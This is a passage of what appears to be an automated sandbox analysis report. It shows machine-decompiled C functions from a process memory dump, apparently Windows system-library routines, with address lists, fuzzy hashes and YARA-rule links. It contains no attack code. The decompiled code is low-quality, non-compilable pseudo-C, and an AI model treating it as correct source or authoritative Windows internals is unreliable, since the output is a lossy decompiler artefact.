											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E04B813C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L04B677F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04B89650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                    0x04b4c608
                                                    0x04b4c615
                                                    0x04b4c625
                                                    0x04b4c62d
                                                    0x04b4c635
                                                    0x04b4c640
                                                    0x04b4c680
                                                    0x04b4c687
                                                    0x04b4c688
                                                    0x04b4c689
                                                    0x04b4c694
                                                    0x04b4c694
                                                    0x04b4c642
                                                    0x04b4c64a
                                                    0x04b4c697
                                                    0x04bb7a25
                                                    0x04bb7a2b
                                                    0x04bb7a2e
                                                    0x04bb7a30
                                                    0x04bb7bea
                                                    0x04bb7bea
                                                    0x00000000
                                                    0x04bb7bea
                                                    0x04bb7a36
                                                    0x04bb7a43
                                                    0x04bb7a48
                                                    0x04bb7a4c
                                                    0x04bb7a4e
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7a58
                                                    0x04bb7a5a
                                                    0x04bb7a5b
                                                    0x04bb7a5c
                                                    0x04bb7a5d
                                                    0x04bb7a63
                                                    0x04bb7a64
                                                    0x04bb7a6a
                                                    0x04bb7a6c
                                                    0x04bb7a6e
                                                    0x04bb79cb
                                                    0x04bb79cb
                                                    0x04bb79ce
                                                    0x04bb79d0
                                                    0x04bb7a98
                                                    0x04bb7a9b
                                                    0x04bb7a9b
                                                    0x04bb7a9e
                                                    0x04bb7aa1
                                                    0x04bb7bbe
                                                    0x04bb7bbe
                                                    0x04bb7bc0
                                                    0x04bb7be0
                                                    0x04bb7be0
                                                    0x04bb7a01
                                                    0x04bb7a01
                                                    0x04bb7a05
                                                    0x04bb7a07
                                                    0x04bb7a15
                                                    0x04bb7a15
                                                    0x04bb7a1a
                                                    0x00000000
                                                    0x04bb7a1a
                                                    0x04bb7bc2
                                                    0x04bb7bc6
                                                    0x04bb7bc9
                                                    0x04bb7bcd
                                                    0x04bb7bcf
                                                    0x04bb79e6
                                                    0x04bb79e6
                                                    0x04bb79eb
                                                    0x04bb79eb
                                                    0x04bb79ef
                                                    0x04bb79f1
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb79f3
                                                    0x04bb79f5
                                                    0x04bb79ff
                                                    0x04bb79ff
                                                    0x00000000
                                                    0x04bb79ff
                                                    0x04bb79f7
                                                    0x04bb79fd
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb79fd
                                                    0x04bb7bd5
                                                    0x04bb7bd8
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7ba9
                                                    0x04bb7bac
                                                    0x04bb7bb0
                                                    0x04bb7bb1
                                                    0x04bb7bb1
                                                    0x04bb7bb6
                                                    0x00000000
                                                    0x04bb7bb6
                                                    0x04bb7aa7
                                                    0x04bb7aaa
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7ab2
                                                    0x04bb7ab3
                                                    0x04bb7ab5
                                                    0x04bb7aec
                                                    0x04bb7aef
                                                    0x04bb7b25
                                                    0x04bb7b28
                                                    0x04bb7b62
                                                    0x04bb7b64
                                                    0x04bb7b8f
                                                    0x04bb7b92
                                                    0x04bb7b96
                                                    0x04bb7b98
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7b9e
                                                    0x04bb7b9f
                                                    0x04bb7ba3
                                                    0x00000000
                                                    0x04bb7ba3
                                                    0x04bb7b66
                                                    0x04bb7b68
                                                    0x04bb7ae2
                                                    0x04bb7ae2
                                                    0x00000000
                                                    0x04bb7ae2
                                                    0x04bb7b6e
                                                    0x04bb7b72
                                                    0x04bb7b75
                                                    0x04bb7b81
                                                    0x04bb7b85
                                                    0x04bb7b87
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7b31
                                                    0x04bb7b34
                                                    0x04bb7b3c
                                                    0x04bb7b45
                                                    0x04bb7b46
                                                    0x04bb7b4f
                                                    0x04bb7b51
                                                    0x04bb7b57
                                                    0x04bb7b59
                                                    0x04bb7b59
                                                    0x00000000
                                                    0x04bb7b59
                                                    0x04bb7b77
                                                    0x00000000
                                                    0x04bb7b77
                                                    0x04bb7b2a
                                                    0x00000000
                                                    0x04bb7b2a
                                                    0x04bb7af1
                                                    0x04bb7af3
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7afb
                                                    0x04bb7afc
                                                    0x04bb7afe
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7b00
                                                    0x04bb7b03
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7b05
                                                    0x04bb7b09
                                                    0x04bb7b0d
                                                    0x04bb7b0f
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7b18
                                                    0x04bb7b1d
                                                    0x00000000
                                                    0x04bb7b1d
                                                    0x04bb7ab7
                                                    0x04bb7ab9
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7abf
                                                    0x04bb7ac1
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7ac3
                                                    0x04bb7ac6
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7ac8
                                                    0x04bb7acc
                                                    0x04bb7ad0
                                                    0x04bb7ad2
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7adb
                                                    0x00000000
                                                    0x04bb7adb
                                                    0x04bb79d6
                                                    0x04bb79d9
                                                    0x04bb79dc
                                                    0x04bb7a91
                                                    0x04bb7a94
                                                    0x00000000
                                                    0x04bb7a94
                                                    0x04bb79e2
                                                    0x00000000
                                                    0x04bb79e2
                                                    0x04bb7a74
                                                    0x04bb7a7a
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb7a8a
                                                    0x04bb7a21
                                                    0x04bb7a21
                                                    0x00000000
                                                    0x04bb7a21
                                                    0x04b4c650
                                                    0x04b4c651
                                                    0x04b4c656
                                                    0x04b4c65c
                                                    0x04b4c65d
                                                    0x04b4c663
                                                    0x04b4c664
                                                    0x04b4c66a
                                                    0x04b4c66e
                                                    0x04bb79c5
                                                    0x04bb79c7
                                                    0x00000000
                                                    0x04bb79c7
                                                    0x04b4c67a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0cc8259c864f61f2885d8b535604382142ccc7a17ce34aca2466f9bfe8680bd6
                                                    • Instruction ID: cafcd7fea89763332abb552e83e755ef445cb37222c4d272aaf46a6b93ccb95a
                                                    • Opcode Fuzzy Hash: 0cc8259c864f61f2885d8b535604382142ccc7a17ce34aca2466f9bfe8680bd6
                                                    • Instruction Fuzzy Hash: 0B819F756046019FDB25CE14C890ABAB7E4EBC8354F1548AEEDC59B240EB70FD45CBE2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BDB8D0, Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 39%
                                                    			E04BDB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4c37b9c; // 0x0
				_t124 = L04B64620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04B89800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E04B895B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E04B895D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L04B677F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04B89910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E04B895D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4c37b9c; // 0x0
									_t92 = L04B64620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04B89910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E04B4A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E04BDE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E04BDE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E04B895B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                    0x04bdb8d9
                                                    0x04bdb8e4
                                                    0x00000000
                                                    0x04bdb8e6
                                                    0x04bdb8f3
                                                    0x04bdb8f5
                                                    0x04bdb8f5
                                                    0x04bdb8f8
                                                    0x04bdb920
                                                    0x04bdb924
                                                    0x04bdb936
                                                    0x04bdb939
                                                    0x04bdb93d
                                                    0x04bdb948
                                                    0x04bdb9a0
                                                    0x04bdb9a0
                                                    0x04bdb9a4
                                                    0x04bdb9bf
                                                    0x04bdb9c4
                                                    0x04bdb9c6
                                                    0x04bdb9cd
                                                    0x04bdb9d1
                                                    0x04bdbad4
                                                    0x04bdbad8
                                                    0x04bdbada
                                                    0x04bdbadc
                                                    0x04bdbadc
                                                    0x04bdbadf
                                                    0x04bdbae0
                                                    0x04bdbae2
                                                    0x04bdbae4
                                                    0x04bdbaec
                                                    0x04bdbaee
                                                    0x04bdbaf0
                                                    0x04bdbaf0
                                                    0x04bdbaec
                                                    0x04bdbafb
                                                    0x04bdbafc
                                                    0x04bdbafe
                                                    0x04bdbb01
                                                    0x04bdbb01
                                                    0x00000000
                                                    0x04bdbb06
                                                    0x04bdb9d7
                                                    0x04bdb9db
                                                    0x04bdb9db
                                                    0x04bdb9de
                                                    0x04bdb9de
                                                    0x04bdb9e4
                                                    0x04bdb9e7
                                                    0x04bdb9ea
                                                    0x04bdb9ec
                                                    0x04bdb9ef
                                                    0x04bdb9f3
                                                    0x04bdba1b
                                                    0x04bdba1b
                                                    0x04bdba23
                                                    0x04bdba24
                                                    0x04bdba27
                                                    0x04bdba2a
                                                    0x04bdba2b
                                                    0x04bdba2e
                                                    0x04bdba30
                                                    0x04bdba37
                                                    0x04bdba3f
                                                    0x04bdba9c
                                                    0x04bdbaa2
                                                    0x04bdbb13
                                                    0x04bdbb15
                                                    0x04bdbaae
                                                    0x04bdbaae
                                                    0x04bdbab3
                                                    0x04bdbab5
                                                    0x04bdbaba
                                                    0x04bdbac8
                                                    0x04bdbac8
                                                    0x04bdbaba
                                                    0x04bdbacd
                                                    0x04bdbacf
                                                    0x00000000
                                                    0x04bdbacf
                                                    0x04bdbb1a
                                                    0x00000000
                                                    0x04bdbb1c
                                                    0x04bdbaa7
                                                    0x04bdbb11
                                                    0x00000000
                                                    0x04bdbb11
                                                    0x04bdbaa9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bdba41
                                                    0x04bdba41
                                                    0x04bdba41
                                                    0x04bdba58
                                                    0x04bdba5d
                                                    0x04bdba62
                                                    0x00000000
                                                    0x00000000
                                                    0x04bdba64
                                                    0x04bdba67
                                                    0x04bdba68
                                                    0x04bdba69
                                                    0x04bdba6c
                                                    0x04bdba6f
                                                    0x04bdba71
                                                    0x04bdba78
                                                    0x04bdba80
                                                    0x00000000
                                                    0x00000000
                                                    0x04bdba90
                                                    0x04bdba90
                                                    0x04bdba97
                                                    0x00000000
                                                    0x04bdba97
                                                    0x04bdb9f5
                                                    0x04bdb9f7
                                                    0x04bdb9f7
                                                    0x04bdb9fa
                                                    0x04bdba03
                                                    0x04bdba07
                                                    0x04bdba0c
                                                    0x04bdba10
                                                    0x04bdba17
                                                    0x00000000
                                                    0x04bdb9f7
                                                    0x04bdb9a6
                                                    0x04bdb9a8
                                                    0x04bdb9af
                                                    0x04bdb9b3
                                                    0x00000000
                                                    0x00000000
                                                    0x04bdb9b9
                                                    0x00000000
                                                    0x04bdb9b9
                                                    0x04bdb94d
                                                    0x04bdb98f
                                                    0x04bdb995
                                                    0x04bdb999
                                                    0x04bdb960
                                                    0x04bdb967
                                                    0x04bdb968
                                                    0x04bdb96a
                                                    0x00000000
                                                    0x04bdb96a
                                                    0x04bdb99b
                                                    0x04bdb99e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bdb99e
                                                    0x04bdb951
                                                    0x04bdb954
                                                    0x04bdb95a
                                                    0x04bdb95e
                                                    0x04bdb972
                                                    0x04bdb979
                                                    0x04bdb97d
                                                    0x04bdb97f
                                                    0x04bdb980
                                                    0x04bdb982
                                                    0x04bdb984
                                                    0x00000000
                                                    0x04bdb984
                                                    0x00000000
                                                    0x04bdb926
                                                    0x00000000
                                                    0x04bdb926

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1863518b5e5e44890950d3650e96e51695f6e3f2efc809b93e815e58c14698f1
                                                    • Instruction ID: e73344061f528ce53bfa59f09dddbcd53acb14185c2b8e3f8cc38051765d29bf
                                                    • Opcode Fuzzy Hash: 1863518b5e5e44890950d3650e96e51695f6e3f2efc809b93e815e58c14698f1
                                                    • Instruction Fuzzy Hash: 8B710E72204B01AFEB31DF14C880F66B7E5EF44724F1245E8E65A8B6A0EB79F941CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BC6DC9, Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E04BC6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04BC6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04B67D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04B89AE0();
					_t87 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E04BC795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E04BC795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E04BC795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E04BC795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04B64620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04BC6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04BC6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04BC6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04BC6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04B67D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04B89AE0();
								L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04B62400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04B62400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04B62400( &_v52);
							}
							if(_v28 >= 0) {
								return L04B62400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                    0x04bc6dd4
                                                    0x04bc6dde
                                                    0x04bc6de1
                                                    0x04bc6de3
                                                    0x04bc6de6
                                                    0x04bc6de9
                                                    0x04bc6dec
                                                    0x04bc6def
                                                    0x04bc6df2
                                                    0x04bc6df5
                                                    0x04bc6dfe
                                                    0x04bc6e04
                                                    0x04bc6e09
                                                    0x04bc6e0d
                                                    0x04bc6e18
                                                    0x04bc6e1b
                                                    0x04bc6e22
                                                    0x04bc6e2d
                                                    0x04bc6e30
                                                    0x04bc6e36
                                                    0x04bc6e42
                                                    0x04bc6e4d
                                                    0x04bc6e50
                                                    0x04bc6e55
                                                    0x04bc6e5c
                                                    0x04bc6e6e
                                                    0x04bc6e5e
                                                    0x04bc6e67
                                                    0x04bc6e67
                                                    0x04bc6e73
                                                    0x04bc6e74
                                                    0x04bc6e77
                                                    0x04bc6e7c
                                                    0x04bc6e7d
                                                    0x04bc6e8e
                                                    0x04bc6e93
                                                    0x04bc6e9c
                                                    0x04bc6ea8
                                                    0x04bc6eab
                                                    0x04bc6eac
                                                    0x04bc6eb3
                                                    0x04bc6ecd
                                                    0x04bc6edc
                                                    0x04bc6ee2
                                                    0x04bc6ee5
                                                    0x04bc6ef2
                                                    0x04bc6efb
                                                    0x04bc6f01
                                                    0x04bc6f06
                                                    0x04bc6f0b
                                                    0x04bc6f11
                                                    0x04bc6f1a
                                                    0x04bc6f22
                                                    0x04bc6f26
                                                    0x04bc6f26
                                                    0x04bc6f33
                                                    0x04bc6f41
                                                    0x04bc6f44
                                                    0x04bc6f47
                                                    0x04bc6f54
                                                    0x04bc6f65
                                                    0x04bc6f77
                                                    0x04bc6f7c
                                                    0x04bc6f82
                                                    0x04bc6f91
                                                    0x04bc6f99
                                                    0x04bc6fa3
                                                    0x04bc6fae
                                                    0x04bc6fae
                                                    0x04bc6fba
                                                    0x04bc6fbb
                                                    0x04bc6fbc
                                                    0x04bc6fc1
                                                    0x04bc6fc2
                                                    0x04bc6fd3
                                                    0x04bc6fd8
                                                    0x04bc6fd8
                                                    0x04bc6fdf
                                                    0x04bc6fe8
                                                    0x04bc6fee
                                                    0x04bc6fee
                                                    0x04bc6ff5
                                                    0x04bc6ffb
                                                    0x04bc6ffb
                                                    0x04bc7004
                                                    0x00000000
                                                    0x04bc700a
                                                    0x04bc7004
                                                    0x04bc6eb3
                                                    0x04bc6e9c
                                                    0x04bc7015

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction ID: d10d5bb4bf6125803e77433c0ea95fde1da3d8a2e8cf21987ac789ae645cd0df
                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction Fuzzy Hash: D7716B71A00609EFDB14DFA8C984EEEBBB9FF48718F1045A9E505E7250DB34BA41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B452A5, Relevance: .2, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E04B452A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04B5EEF0(0x4c379a0);
					_t104 =  *0x4c38210; // 0xc91cc8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E04B5EB70(_t93, 0x4c379a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E04B89890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04B5EEF0(0x4c379a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04B5EB70(0, 0x4c379a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xc91cd5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04B7F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04B5EEF0(0x4c379a0);
									__eflags =  *0x4c38210 - _t104; // 0xc91cc8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4c38210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
